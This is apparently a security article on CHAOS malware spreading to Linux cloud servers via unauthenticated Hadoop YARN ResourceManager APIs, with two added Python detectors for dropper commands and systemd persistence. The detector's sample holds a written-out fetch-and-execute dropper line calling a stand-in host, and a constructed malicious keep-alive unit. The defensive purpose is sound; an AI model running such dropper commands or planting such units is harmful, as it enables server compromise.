Chaos Malware Spreads to Linux Cloud Servers via Routers


The CHAOS malware, first documented by Lumen's Black Lotus Labs as a threat to routers and other edge devices, has now been observed compromising Linux cloud servers, according to research published by Darktrace.

  • The shift matters because cloud servers typically hold sensitive data and run production workloads, so a CHAOS infection there has far greater impact than one on a home router.
  • The intrusion begins with an HTTP request to the Hadoop deployment's ResourceManager application-submission endpoint. The request defines a new YARN application and embeds a sequence of shell commands in its launch specification, which the cluster then executes on a worker node. This works wherever the ResourceManager API is reachable without authentication, which is the case in a default Hadoop installation.
  • Those commands fetch a CHAOS agent binary from an attacker-controlled server, mark it executable, run it, and then delete it from disk so that only the running process remains.
  • The agent binary is served from a domain previously linked to Operation Silk Lure, a separate campaign that delivered the ValleyRAT remote access trojan through malicious job-application attachments.
  • The new sample is a 64-bit ELF binary built for x86-64 Linux, whereas the earlier, router-focused variants were compiled for ARM, MIPS, and PowerPC.
  • The internal namespace was restructured, and several functions were rewritten or removed, including the SSH brute-forcing spreader and some of the vulnerability-exploitation routines inherited from Kaiji, the botnet CHAOS descends from.
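The command chain in the submission request is the most reliable place to catch this intrusion, because every stage lands in one JSON body. The detector below is an added example, not Darktrace's or Lumen's code and not taken from a real CHAOS request: it assumes the submission arrives in the shape the YARN REST API uses (an `am-container-spec` object carrying a `commands` entry), and the two request bodies, including the hostname and application ids, are constructed for illustration.

```python
"""Flag YARN application submissions whose container launch command follows the
CHAOS intrusion chain described above: fetch a binary, make it executable, run it,
delete it from disk.  Added example; request bodies below are constructed."""
import json
import os
import re
import shlex

DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "dash"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Operators a one-liner dropper uses to chain its stages.
_SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def commands_from_body(body: str) -> list[str]:
    """Pull the AM container command(s) out of a YARN REST submission body."""
    spec = json.loads(body).get("am-container-spec", {})
    cmd = spec.get("commands", {}).get("command", [])
    return [cmd] if isinstance(cmd, str) else list(cmd)


def stages_in(cmdline: str) -> dict[str, bool]:
    """Report which dropper stages appear in one shell command line."""
    stages = {"download": False, "chmod": False, "execute": False, "delete": False}
    fetched = set()  # basenames that curl/wget would write to disk
    for part in _SPLIT.split(cmdline):
        try:
            argv = shlex.split(part)
        except ValueError:  # unbalanced quotes: fall back to a whitespace split
            argv = part.split()
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        if prog in DOWNLOADERS:
            stages["download"] = True
            for i, arg in enumerate(argv):
                if arg in ("-o", "-O", ">") and i + 1 < len(argv):
                    fetched.add(os.path.basename(argv[i + 1]))
                elif arg.startswith(("http://", "https://", "ftp://")):
                    fetched.add(os.path.basename(arg))  # default save name
        elif prog == "chmod":
            stages["chmod"] = True
        elif prog == "rm":
            stages["delete"] = True
        elif prog in INTERPRETERS:
            # "sh /tmp/x", or "curl ... | sh" where the script arrives on stdin
            piped = len(argv) == 1 and stages["download"]
            if piped or os.path.basename(argv[-1]) in fetched:
                stages["execute"] = True
        elif prog in fetched or argv[0].startswith(SCRATCH_DIRS):
            stages["execute"] = True
    return stages


def dropper_score(cmdline: str) -> int:
    """0-4: how many of the four stages are present."""
    return sum(stages_in(cmdline).values())


def is_dropper(cmdline: str) -> bool:
    """Download followed by execution of what was downloaded is the core signal;
    chmod and rm raise confidence, but a bare 'curl | sh' still counts."""
    s = stages_in(cmdline)
    return s["download"] and s["execute"]


def flag_submission(body: str) -> list[str]:
    """Return the command lines in a submission that look like a dropper."""
    return [c for c in commands_from_body(body) if is_dropper(c)]


# Constructed sample bodies in the shape of the YARN "apps" submission API;
# the hostname and application ids are fictitious.
MALICIOUS_BODY = json.dumps({
    "application-id": "application_1700000000000_0001",
    "application-name": "hadoop-health",
    "application-type": "YARN",
    "am-container-spec": {"commands": {"command":
        "cd /tmp && curl -s http://dropper.example.invalid/agent -o agent "
        "&& chmod +x agent && ./agent; rm -f agent"}},
})
BENIGN_BODY = json.dumps({
    "application-id": "application_1700000000000_0002",
    "application-name": "wordcount",
    "application-type": "MAPREDUCE",
    "am-container-spec": {"commands": {"command":
        "{{JAVA_HOME}}/bin/java -Xmx256m org.apache.hadoop.examples.WordCount "
        "/data/in /data/out 1><LOG_DIR>/stdout 2><LOG_DIR>/stderr"}},
})

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        for cmd in commands_from_body(body):
            print(f"{label}: score={dropper_score(cmd)} {stages_in(cmd)}")
```

The splitter deliberately breaks on `|` as well as `;` and `&&`, so a `curl ... | sh` variant that skips the chmod and rm stages is still caught; the score is exposed separately so an alerting rule can demand the full four-stage chain where false positives are a concern.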

New Persistence Method

The malware establishes persistence through systemd and writes a keep-alive script to disk, so the agent is restarted rather than lost when its process is killed or the server reboots. A new unit file that launches a script or binary from a scratch or hidden directory is therefore the artifact to look for on a suspected host.
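A hunt for that kind of unit, as an added example rather than Darktrace's detection logic: the page does not publish the real unit file, so the suspicious unit below (its name, description and the `/tmp/.X11-lock/keepalive.sh` path) is constructed to show the pattern, and the clean unit is a stand-in for a packaged service.

```python
"""Audit systemd unit files for dropped persistence: an Exec* line that runs
something from a scratch or hidden path, kept alive by Restart=.
Added example; the sample units below are constructed, not real CHAOS artifacts."""
import os
import re
import tempfile

UNIT_DIRS = ("/etc/systemd/system", "/usr/lib/systemd/system",
             "/lib/systemd/system", "/run/systemd/system")
# Scratch directories, home directories, or any hidden path component.
SUSPECT_PATH = re.compile(r"^(?:/tmp|/var/tmp|/dev/shm|/root|/home)(?:/|$)|/\.[^/]")
# Absolute paths inside an Exec* value, including ones buried in "sh -c '...'".
PATH_RE = re.compile(r"/[^\s;'\"|&()]+")


def parse_unit(text: str) -> dict[str, list[str]]:
    """Minimal INI-style parser; systemd allows repeated keys, so values are lists."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", ";", "[")):
            continue
        key, _, value = line.partition("=")
        fields.setdefault(key.strip(), []).append(value.strip())
    return fields


def audit_unit(text: str) -> list[str]:
    """Return the reasons a unit looks like dropped persistence (empty = clean)."""
    fields = parse_unit(text)
    reasons = []
    for key, values in fields.items():
        if not key.startswith("Exec"):
            continue
        for path in PATH_RE.findall(" ".join(values)):
            if SUSPECT_PATH.search(path):
                reasons.append(f"{key} runs from an untrusted location: {path}")
    restart = fields.get("Restart", [""])[-1]
    if reasons and restart in ("always", "on-failure"):
        reasons.append(f"Restart={restart} keeps the payload alive")
    return reasons


def scan_unit_dirs(root: str = "/") -> dict[str, list[str]]:
    """Walk the systemd unit directories under root; return units with findings."""
    findings = {}
    for d in UNIT_DIRS:
        full = os.path.join(root, d.lstrip("/"))
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            path = os.path.join(full, name)
            if name.endswith(".service") and os.path.isfile(path):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reasons = audit_unit(fh.read())
                if reasons:
                    findings[name] = reasons
    return findings


# Constructed sample units (invented name, description and script path).
SUSPICIOUS_UNIT = """[Unit]
Description=System Update Service

[Service]
Type=simple
ExecStart=/bin/sh -c '/tmp/.X11-lock/keepalive.sh'
Restart=always
RestartSec=30

[Install]
WantedBy=multi-user.target
"""
CLEAN_UNIT = """[Unit]
Description=OpenBSD Secure Shell server

[Service]
ExecStartPre=/usr/sbin/sshd -t
ExecStart=/usr/sbin/sshd -D
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""


def build_sample_tree() -> str:
    """Create a throwaway root containing one clean and one suspicious unit."""
    root = tempfile.mkdtemp(prefix="unit-audit-")
    unit_dir = os.path.join(root, "etc/systemd/system")
    os.makedirs(unit_dir)
    for name, text in (("sshd.service", CLEAN_UNIT),
                       ("sysupdate.service", SUSPICIOUS_UNIT)):
        with open(os.path.join(unit_dir, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


if __name__ == "__main__":
    for unit, reasons in scan_unit_dirs(build_sample_tree()).items():
        print(unit, *reasons, sep="\n  ")
```

Run with the default root on a live host to audit the real unit directories; the `Restart=` check is only reported alongside a path finding, since restarting on failure is normal for legitimate daemons.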

Proxy Functionality

The agent can communicate over HTTP, TLS, raw TCP, UDP, and WebSocket, and it implements a SOCKS proxy, which lets the operator route traffic through the compromised server rather than merely control it.

Circumstantial Evidence

Definitive attribution remains difficult. Darktrace's analysis assesses a likely Chinese origin on circumstantial grounds: Chinese-language strings in the binary and zh-CN locale indicators. Such artifacts can be inherited from shared code or planted deliberately, so they are indicators rather than proof.

Darktrace's research concludes that the expansion of CHAOS from routers to Linux cloud servers is a significant threat to any organization running cloud workloads, and in particular to those exposing Hadoop services to the internet.

Conclusion

Because the intrusion path described here starts with a reachable Hadoop ResourceManager, the concrete defenses follow directly from it: do not expose the ResourceManager web interface and REST API to untrusted networks, enable authentication on Hadoop's HTTP endpoints rather than relying on the anonymous default, alert on application submissions whose launch commands download and execute a file, and monitor for newly created systemd units that run from scratch or hidden directories. Proper configuration and continuous monitoring remain the baseline against this evolving threat.
